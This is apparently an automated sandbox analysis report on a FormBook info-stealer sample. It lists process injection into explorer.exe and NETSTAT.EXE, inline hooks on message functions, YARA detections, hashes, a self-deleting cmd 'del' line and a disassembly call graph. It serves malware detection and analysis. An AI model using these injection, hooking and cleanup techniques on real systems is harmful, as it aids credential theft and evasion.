              Expires: Fri, 27 May 2022 18:11:52 GMT
              Location: https://www.savingshk.com/a5vu/?l2MHK=FVYX5&4hOD6=FXMAgLN/IrBd2h0A7KmJ0dUV04fd60Tmz3QO5NzukmZcmTlm3Sf9IrYXmxrDB/U5IQUf
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2fygWVtW%2FKjyGrU7NWl%2BbohYlg4UfYoikT%2FUPdJB%2BdFmXDUSmP8o6%2FpJCFBE%2FfxFhcnIgb4SaX8R9Vw2Fzk%2Fmd1nna9Kad4mly7uwHyZgRnCfzu9LAusoUrkUmH4KJlKWYR0Kg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 71205f497c8d918e-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Code Manipulations

              User Modules

              Hook Summary

              Function NameHook TypeActive in Processes
              PeekMessageAINLINEexplorer.exe
              PeekMessageWINLINEexplorer.exe
              GetMessageWINLINEexplorer.exe
              GetMessageAINLINEexplorer.exe

              Processes

              Process: explorer.exe, Module: user32.dll
              Function NameHook TypeNew Data
              PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE
              PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
              GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEE
              GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEE

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:19:10:15
              Start date:27/05/2022
              Path:C:\Users\user\Desktop\O1ySvN9SvL.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\O1ySvN9SvL.exe"
              Imagebase:0x400000
              File size:299086 bytes
              MD5 hash:CAA4C5D863A9324FA6B3A735ED446897
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:1
              Start time:19:10:17
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\zrztlh.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
              Imagebase:0xea0000
              File size:191488 bytes
              MD5 hash:917BF3E1E68704B188F2192850C76FA6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.447718606.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Antivirus matches:
              • Detection: 50%, ReversingLabs
              Reputation:low

              General

              Target ID:2
              Start time:19:10:17
              Start date:27/05/2022
              Path:C:\Users\user\AppData\Local\Temp\zrztlh.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
              Imagebase:0xea0000
              File size:191488 bytes
              MD5 hash:917BF3E1E68704B188F2192850C76FA6
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.532479062.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.533348401.0000000001550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.532198194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.445889127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.443445716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low

              General

              Target ID:3
              Start time:19:10:25
              Start date:27/05/2022
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff74fc70000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.509506176.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.489068141.0000000005327000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:high

              General

              Target ID:10
              Start time:19:10:59
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\NETSTAT.EXE
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
              Imagebase:0x1180000
              File size:32768 bytes
              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.716381096.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.716275585.0000000000E30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.715399968.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate

              General

              Target ID:12
              Start time:19:11:03
              Start date:27/05/2022
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\AppData\Local\Temp\zrztlh.exe"
              Imagebase:0x1100000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:13
              Start time:19:11:05
              Start date:27/05/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff77f440000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:15.7%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:21.1%
                Total number of Nodes:1254
                Total number of Limit Nodes:27
                execution_graph 3509 401745 3510 402a85 17 API calls 3509->3510 3511 40174c SearchPathA 3510->3511 3512 401767 3511->3512 3513 4021c8 3514 402a85 17 API calls 3513->3514 3515 4021ce 3514->3515 3516 402a85 17 API calls 3515->3516 3517 4021da 3516->3517 3518 405d9c 4 API calls 3517->3518 3519 4021e2 3518->3519 3520 4021f3 lstrlenA lstrlenA 3519->3520 3527 4021e6 3519->3527 3522 405b16 17 API calls 3520->3522 3521 404e9f 24 API calls 3526 4021ee 3521->3526 3523 402221 lstrcatA 3522->3523 3524 404e9f 24 API calls 3523->3524 3525 402243 SHFileOperationA 3524->3525 3525->3526 3525->3527 3527->3521 3527->3526 3528 402bca 3529 402be2 SetTimer 3528->3529 3530 402bfd 3528->3530 3529->3530 3531 402c74 3530->3531 3532 402c12 MulDiv 3530->3532 3533 402c32 wsprintfA SetWindowTextA SetDlgItemTextA ShowWindow 3532->3533 3534 402c57 3532->3534 3533->3534 3534->3531 3535 402c60 wsprintfA 3534->3535 3536 404e9f 24 API calls 3535->3536 3536->3531 3537 4014ca 3538 4014de 3537->3538 3540 4014cf 3537->3540 3539 404e9f 24 API calls 3538->3539 3538->3540 3539->3540 3541 4022ca 3542 402a85 17 API calls 3541->3542 3543 4022d8 3542->3543 3544 402a85 17 API calls 3543->3544 3545 4022e1 3544->3545 3546 402a85 17 API calls 3545->3546 3547 4022eb GetPrivateProfileStringA 3546->3547 3548 40164d 3549 402a85 17 API calls 3548->3549 3550 401654 3549->3550 3551 402a85 17 API calls 3550->3551 3552 40165e 3551->3552 3564 405af4 lstrcpynA 3552->3564 3554 40166f lstrlenA lstrlenA 3555 40168b lstrcatA lstrcatA 3554->3555 3556 40169f MoveFileA 3554->3556 3555->3556 3557 4016b6 3556->3557 3558 4016af 3556->3558 3560 405d9c 4 API calls 3557->3560 3562 4021bf 3557->3562 3559 401423 24 API calls 3558->3559 3559->3562 3561 4016c7 3560->3561 3561->3562 3563 405842 37 API calls 3561->3563 3563->3558 3564->3554 3572 401b51 3573 401ba2 3572->3573 3574 401b5e 3572->3574 3575 401ba6 3573->3575 3576 401bcb GlobalAlloc 3573->3576 3577 40225e 3574->3577 3581 401b75 3574->3581 3583 401be6 3575->3583 3593 405af4 lstrcpynA 3575->3593 3578 405b16 17 API calls 3576->3578 3579 405b16 17 API calls 3577->3579 3578->3583 3584 40226b 3579->3584 3591 405af4 lstrcpynA 3581->3591 3582 401bb8 GlobalFree 3582->3583 3586 4053c2 MessageBoxIndirectA 3584->3586 3586->3583 3587 401b84 3592 405af4 lstrcpynA 3587->3592 3589 401b93 3594 405af4 lstrcpynA 3589->3594 3591->3587 3592->3589 3593->3582 3594->3583 3595 402257 3596 40225e 3595->3596 3598 402271 3595->3598 3597 405b16 17 API calls 3596->3597 3599 40226b 3597->3599 3600 4053c2 MessageBoxIndirectA 3599->3600 3600->3598 3601 401cd7 3607 402a68 3601->3607 3603 401cde 3604 402a68 17 API calls 3603->3604 3605 401ce6 GetDlgItem 3604->3605 3606 40251b 3605->3606 3608 405b16 17 API calls 3607->3608 3609 402a7c 3608->3609 3609->3603 3610 404fdd 3611 405189 3610->3611 3612 404ffe GetDlgItem GetDlgItem GetDlgItem 3610->3612 3614 405192 GetDlgItem CreateThread CloseHandle 3611->3614 3615 4051ba 3611->3615 3656 403f2a SendMessageA 3612->3656 3614->3615 3617 4051d1 ShowWindow ShowWindow 3615->3617 3618 405207 3615->3618 3619 4051e5 3615->3619 3616 40506f 3620 405076 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3616->3620 3658 403f2a SendMessageA 3617->3658 3625 403f5c 8 API calls 3618->3625 3621 405243 3619->3621 3623 4051f6 3619->3623 3624 40521c ShowWindow 3619->3624 3628 4050e5 3620->3628 3629 4050c9 SendMessageA SendMessageA 3620->3629 3621->3618 3630 40524e SendMessageA 3621->3630 3631 403ece SendMessageA 3623->3631 3626 40523c 3624->3626 3627 40522e 3624->3627 3632 405215 3625->3632 3634 403ece SendMessageA 3626->3634 3633 404e9f 24 API calls 3627->3633 3635 4050f8 3628->3635 3636 4050ea SendMessageA 3628->3636 3629->3628 3630->3632 3637 405267 CreatePopupMenu 3630->3637 3631->3618 3633->3626 3634->3621 3639 403ef5 18 API calls 3635->3639 3636->3635 3638 405b16 17 API calls 3637->3638 3640 405277 AppendMenuA 3638->3640 3641 405108 3639->3641 3642 40528a GetWindowRect 3640->3642 3643 40529d 3640->3643 3644 405111 ShowWindow 3641->3644 3645 405145 GetDlgItem SendMessageA 3641->3645 3647 4052a6 TrackPopupMenu 3642->3647 3643->3647 3648 405127 ShowWindow 3644->3648 3650 405134 3644->3650 3645->3632 3646 40516c SendMessageA SendMessageA 3645->3646 3646->3632 3647->3632 3649 4052c4 3647->3649 3648->3650 3652 4052e0 SendMessageA 3649->3652 3657 403f2a SendMessageA 3650->3657 3652->3652 3653 4052fd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3652->3653 3654 40531f SendMessageA 3653->3654 3654->3654 3655 405340 GlobalUnlock SetClipboardData CloseClipboard 3654->3655 3655->3632 3656->3616 3657->3645 3658->3619 3659 40265e 3660 402665 3659->3660 3661 40291a 3659->3661 3662 40266b FindClose 3660->3662 3662->3661 3663 4026df 3664 402a85 17 API calls 3663->3664 3665 4026ec 3664->3665 3666 402706 3665->3666 3667 4026f9 3665->3667 3698 405af4 lstrcpynA 3666->3698 3697 405af4 lstrcpynA 3667->3697 3670 402704 3674 405d03 5 API calls 3670->3674 3671 402715 3672 4055e7 3 API calls 3671->3672 3673 40271b lstrcatA 3672->3673 3673->3670 3675 40272c 3674->3675 3676 4057ac 2 API calls 3675->3676 3677 402732 3676->3677 3699 4057cb GetFileAttributesA CreateFileA 3677->3699 3679 40273f 3680 40274b GlobalAlloc 3679->3680 3681 4027ed 3679->3681 3682 402764 3680->3682 3683 4027df CloseHandle 3680->3683 3684 4027f5 DeleteFileA 3681->3684 3685 402806 3681->3685 3700 4032af SetFilePointer 3682->3700 3683->3681 3684->3685 3687 40276a 3688 40327d ReadFile 3687->3688 3689 402773 GlobalAlloc 3688->3689 3690 402783 3689->3690 3691 4027b7 WriteFile GlobalFree 3689->3691 3693 402f71 21 API calls 3690->3693 3692 402f71 21 API calls 3691->3692 3694 4027dc 3692->3694 3696 402790 3693->3696 3694->3683 3695 4027ae GlobalFree 3695->3691 3696->3695 3697->3670 3698->3671 3699->3679 3700->3687 3701 4016e1 3702 402a85 17 API calls 3701->3702 3703 4016e7 GetFullPathNameA 3702->3703 3704 4016fe 3703->3704 3710 40171f 3703->3710 3707 405d9c 4 API calls 3704->3707 3704->3710 3705 401733 GetShortPathNameA 3706 40291a 3705->3706 3708 40170f 3707->3708 3708->3710 3711 405af4 lstrcpynA 3708->3711 3710->3705 3710->3706 3711->3710 3712 401de2 3713 402a68 17 API calls 3712->3713 3714 401de8 3713->3714 3715 402a68 17 API calls 3714->3715 3716 401df1 3715->3716 3717 401e03 EnableWindow 3716->3717 3718 401df8 ShowWindow 3716->3718 3719 40291a 3717->3719 3718->3719 3720 401563 3721 4028c2 3720->3721 3724 405a52 wsprintfA 3721->3724 3723 4028c7 3724->3723 3024 403664 3025 403675 CloseHandle 3024->3025 3026 40367f 3024->3026 3025->3026 3027 403693 3026->3027 3028 403689 CloseHandle 3026->3028 3031 405426 3027->3031 3028->3027 3071 4056c8 3031->3071 3034 405445 DeleteFileA 3036 40369f 3034->3036 3035 40545c 3037 405582 3035->3037 3085 405af4 lstrcpynA 3035->3085 3037->3036 3086 405d9c SetErrorMode FindFirstFileA SetErrorMode 3037->3086 3039 405483 3040 405496 3039->3040 3041 405489 lstrcatA 3039->3041 3095 40562e lstrlenA 3040->3095 3042 40549c lstrcatA lstrlenA FindFirstFileA 3041->3042 3042->3037 3049 4054cb 3042->3049 3046 405612 CharNextA 3046->3049 3049->3046 3053 405561 FindNextFileA 3049->3053 3058 405528 3049->3058 3063 405426 60 API calls 3049->3063 3099 405af4 lstrcpynA 3049->3099 3053->3049 3056 405579 FindClose 3053->3056 3054 4055c2 3054->3036 3057 4055c8 3054->3057 3055 4055d9 3059 404e9f 24 API calls 3055->3059 3056->3037 3060 404e9f 24 API calls 3057->3060 3061 4057ac 2 API calls 3058->3061 3059->3036 3062 4055d0 3060->3062 3064 40552e DeleteFileA 3061->3064 3065 405842 37 API calls 3062->3065 3063->3049 3069 405539 3064->3069 3067 4055d7 3065->3067 3066 404e9f 24 API calls 3066->3053 3067->3036 3069->3053 3069->3066 3100 404e9f 3069->3100 3111 405842 3069->3111 3137 405af4 lstrcpynA 3071->3137 3073 4056d9 3138 40567b CharNextA CharNextA 3073->3138 3075 40543a 3075->3034 3075->3035 3077 405d03 5 API calls 3083 4056ef 3077->3083 3078 40571a lstrlenA 3079 405725 3078->3079 3078->3083 3080 4055e7 3 API calls 3079->3080 3082 40572a GetFileAttributesA 3080->3082 3081 405d9c 4 API calls 3081->3083 3082->3075 3083->3075 3083->3078 3083->3081 3084 40562e 2 API calls 3083->3084 3084->3078 3085->3039 3087 4055a7 3086->3087 3088 405dc7 FindClose 3086->3088 3087->3036 3089 4055e7 lstrlenA CharPrevA 3087->3089 3088->3087 3090 405601 lstrcatA 3089->3090 3091 4055b1 3089->3091 3090->3091 3092 4057ac GetFileAttributesA 3091->3092 3093 4055b7 RemoveDirectoryA 3092->3093 3094 4057bb SetFileAttributesA 3092->3094 3093->3054 3093->3055 3094->3093 3096 40563b 3095->3096 3097 405640 CharPrevA 3096->3097 3098 40564c 3096->3098 3097->3096 3097->3098 3098->3042 3099->3049 3102 404eba 3100->3102 3110 404f5d 3100->3110 3101 404ed7 lstrlenA 3104 404f00 3101->3104 3105 404ee5 lstrlenA 3101->3105 3102->3101 3103 405b16 17 API calls 3102->3103 3103->3101 3107 404f13 3104->3107 3108 404f06 SetWindowTextA 3104->3108 3106 404ef7 lstrcatA 3105->3106 3105->3110 3106->3104 3109 404f19 SendMessageA SendMessageA SendMessageA 3107->3109 3107->3110 3108->3107 3109->3110 3110->3069 3144 405dda GetModuleHandleA 3111->3144 3114 4058aa GetShortPathNameA 3115 40599f 3114->3115 3116 4058bf 3114->3116 3115->3069 3116->3115 3119 4058c7 wsprintfA 3116->3119 3118 40588e CloseHandle GetShortPathNameA 3118->3115 3120 4058a2 3118->3120 3121 405b16 17 API calls 3119->3121 3120->3114 3120->3115 3122 4058ef 3121->3122 3149 4057cb GetFileAttributesA CreateFileA 3122->3149 3124 4058fc 3124->3115 3125 40590b GetFileSize GlobalAlloc 3124->3125 3126 405998 CloseHandle 3125->3126 3127 405929 ReadFile 3125->3127 3126->3115 3127->3126 3128 40593d 3127->3128 3128->3126 3150 405740 lstrlenA 3128->3150 3131 405952 3155 405af4 lstrcpynA 3131->3155 3132 4059ac 3134 405740 4 API calls 3132->3134 3135 405960 3134->3135 3136 405973 SetFilePointer WriteFile GlobalFree 3135->3136 3136->3126 3137->3073 3139 405695 3138->3139 3142 4056a1 3138->3142 3140 40569c CharNextA 3139->3140 3139->3142 3141 4056be 3140->3141 3141->3075 3141->3077 3142->3141 3143 405612 CharNextA 3142->3143 3143->3142 3145 405e01 GetProcAddress 3144->3145 3146 405df6 LoadLibraryA 3144->3146 3147 40584d 3145->3147 3146->3145 3146->3147 3147->3114 3147->3115 3148 4057cb GetFileAttributesA CreateFileA 3147->3148 3148->3118 3149->3124 3151 405776 lstrlenA 3150->3151 3152 405780 3151->3152 3153 405754 lstrcmpiA 3151->3153 3152->3131 3152->3132 3153->3152 3154 40576d CharNextA 3153->3154 3154->3151 3155->3135 3725 402366 3726 40236c 3725->3726 3727 402a85 17 API calls 3726->3727 3728 40237e 3727->3728 3729 402a85 17 API calls 3728->3729 3730 402388 RegCreateKeyExA 3729->3730 3731 4023b2 3730->3731 3732 40291a 3730->3732 3733 4023ca 3731->3733 3734 402a85 17 API calls 3731->3734 3735 4023d6 3733->3735 3737 402a68 17 API calls 3733->3737 3736 4023c3 lstrlenA 3734->3736 3738 4023f1 RegSetValueExA 3735->3738 3740 402f71 21 API calls 3735->3740 3736->3733 3737->3735 3739 402407 RegCloseKey 3738->3739 3739->3732 3740->3738 3749 401d68 GetDC GetDeviceCaps 3750 402a68 17 API calls 3749->3750 3751 401d84 MulDiv 3750->3751 3752 402a68 17 API calls 3751->3752 3753 401d99 3752->3753 3754 405b16 17 API calls 3753->3754 3755 401dd2 CreateFontIndirectA 3754->3755 3756 40251b 3755->3756 3757 402569 3758 402a68 17 API calls 3757->3758 3761 402573 3758->3761 3759 4025e9 3760 4025a7 ReadFile 3760->3759 3760->3761 3761->3759 3761->3760 3762 4025eb 3761->3762 3763 4025fb 3761->3763 3766 405a52 wsprintfA 3762->3766 3763->3759 3765 402611 SetFilePointer 3763->3765 3765->3759 3766->3759 3455 40176c 3456 402a85 17 API calls 3455->3456 3457 401773 3456->3457 3458 4057fa 2 API calls 3457->3458 3459 40177a 3458->3459 3460 4057fa 2 API calls 3459->3460 3460->3459 3767 4042ec 3768 404322 3767->3768 3769 4042fc 3767->3769 3771 403f5c 8 API calls 3768->3771 3770 403ef5 18 API calls 3769->3770 3772 404309 SetDlgItemTextA 3770->3772 3773 40432e 3771->3773 3772->3768 3774 40196d 3775 402a85 17 API calls 3774->3775 3776 401974 lstrlenA 3775->3776 3777 40251b 3776->3777 3778 4047ee GetDlgItem GetDlgItem 3779 404842 7 API calls 3778->3779 3783 404a5f 3778->3783 3780 4048e8 DeleteObject 3779->3780 3781 4048db SendMessageA 3779->3781 3782 4048f3 3780->3782 3781->3780 3784 40492a 3782->3784 3787 405b16 17 API calls 3782->3787 3803 404b49 3783->3803 3810 404ad3 3783->3810 3831 40476e SendMessageA 3783->3831 3785 403ef5 18 API calls 3784->3785 3788 40493e 3785->3788 3786 404bf8 3790 404c01 SendMessageA 3786->3790 3791 404c0d 3786->3791 3792 40490c SendMessageA SendMessageA 3787->3792 3794 403ef5 18 API calls 3788->3794 3789 404a52 3796 403f5c 8 API calls 3789->3796 3790->3791 3798 404c26 3791->3798 3799 404c1f ImageList_Destroy 3791->3799 3807 404c36 3791->3807 3792->3782 3811 40494c 3794->3811 3795 404ba2 SendMessageA 3795->3789 3801 404bb7 SendMessageA 3795->3801 3802 404de8 3796->3802 3797 404b3b SendMessageA 3797->3803 3804 404c2f GlobalFree 3798->3804 3798->3807 3799->3798 3800 404d9c 3800->3789 3808 404dae ShowWindow GetDlgItem ShowWindow 3800->3808 3806 404bca 3801->3806 3803->3786 3803->3789 3803->3795 3804->3807 3805 404a20 GetWindowLongA SetWindowLongA 3809 404a39 3805->3809 3818 404bdb SendMessageA 3806->3818 3807->3800 3817 40140b 2 API calls 3807->3817 3825 404c68 3807->3825 3808->3789 3812 404a57 3809->3812 3813 404a3f ShowWindow 3809->3813 3810->3797 3810->3803 3811->3805 3816 40499b SendMessageA 3811->3816 3819 404a1a 3811->3819 3820 4049d7 SendMessageA 3811->3820 3821 4049e8 SendMessageA 3811->3821 3830 403f2a SendMessageA 3812->3830 3829 403f2a SendMessageA 3813->3829 3816->3811 3817->3825 3818->3786 3819->3805 3819->3809 3820->3811 3821->3811 3822 404d72 InvalidateRect 3822->3800 3823 404d88 3822->3823 3836 40468c 3823->3836 3824 404c96 SendMessageA 3828 404cac 3824->3828 3825->3824 3825->3828 3827 404d20 SendMessageA SendMessageA 3827->3828 3828->3822 3828->3827 3829->3789 3830->3783 3832 404791 GetMessagePos ScreenToClient SendMessageA 3831->3832 3833 4047cd SendMessageA 3831->3833 3834 4047ca 3832->3834 3835 4047c5 3832->3835 3833->3835 3834->3833 3835->3810 3837 4046a6 3836->3837 3838 405b16 17 API calls 3837->3838 3839 4046db 3838->3839 3840 405b16 17 API calls 3839->3840 3841 4046e6 3840->3841 3842 405b16 17 API calls 3841->3842 3843 404717 lstrlenA wsprintfA SetDlgItemTextA 3842->3843 3843->3800 3844 40156f 3845 401586 3844->3845 3846 40157f ShowWindow 3844->3846 3847 401594 ShowWindow 3845->3847 3848 40291a 3845->3848 3846->3845 3847->3848 3849 404def 3850 404e14 3849->3850 3851 404dfd 3849->3851 3852 404e22 IsWindowVisible 3850->3852 3859 404e39 3850->3859 3853 404e03 3851->3853 3867 404e7d 3851->3867 3854 404e2f 3852->3854 3852->3867 3856 403f41 SendMessageA 3853->3856 3858 40476e 5 API calls 3854->3858 3855 404e83 CallWindowProcA 3857 404e0d 3855->3857 3856->3857 3858->3859 3859->3855 3868 405af4 lstrcpynA 3859->3868 3861 404e68 3869 405a52 wsprintfA 3861->3869 3863 404e6f 3864 40140b 2 API calls 3863->3864 3865 404e76 3864->3865 3870 405af4 lstrcpynA 3865->3870 3867->3855 3868->3861 3869->3863 3870->3867 3871 401ef0 3872 402a85 17 API calls 3871->3872 3873 401ef7 3872->3873 3874 405d9c 4 API calls 3873->3874 3875 401efd 3874->3875 3877 401f0f 3875->3877 3878 405a52 wsprintfA 3875->3878 3878->3877 3879 401a71 3880 402a68 17 API calls 3879->3880 3881 401a77 3880->3881 3882 402a68 17 API calls 3881->3882 3883 401a21 3882->3883 3884 401cf2 3885 402a68 17 API calls 3884->3885 3886 401d02 SetWindowLongA 3885->3886 3887 40291a 3886->3887 3888 4028f5 SendMessageA 3889 40291a 3888->3889 3890 40290f InvalidateRect 3888->3890 3890->3889 3156 401e76 3172 402a85 3156->3172 3159 404e9f 24 API calls 3160 401e86 3159->3160 3178 405361 CreateProcessA 3160->3178 3162 401ee2 CloseHandle 3164 4026bf 3162->3164 3163 401eab WaitForSingleObject 3165 401e8c 3163->3165 3166 401eb9 GetExitCodeProcess 3163->3166 3165->3162 3165->3163 3165->3164 3181 405e13 3165->3181 3168 401ed6 3166->3168 3169 401ecb 3166->3169 3168->3162 3171 401ed4 3168->3171 3185 405a52 wsprintfA 3169->3185 3171->3162 3173 402a91 3172->3173 3174 405b16 17 API calls 3173->3174 3175 402ab2 3174->3175 3176 401e7c 3175->3176 3177 405d03 5 API calls 3175->3177 3176->3159 3177->3176 3179 405390 CloseHandle 3178->3179 3180 40539c 3178->3180 3179->3180 3180->3165 3182 405e30 PeekMessageA 3181->3182 3183 405e40 3182->3183 3184 405e26 DispatchMessageA 3182->3184 3183->3163 3184->3182 3185->3171 3898 402078 3899 402a85 17 API calls 3898->3899 3900 40207f 3899->3900 3901 402a85 17 API calls 3900->3901 3902 402089 3901->3902 3903 402a85 17 API calls 3902->3903 3904 402092 3903->3904 3905 402a85 17 API calls 3904->3905 3906 40209c 3905->3906 3907 402a85 17 API calls 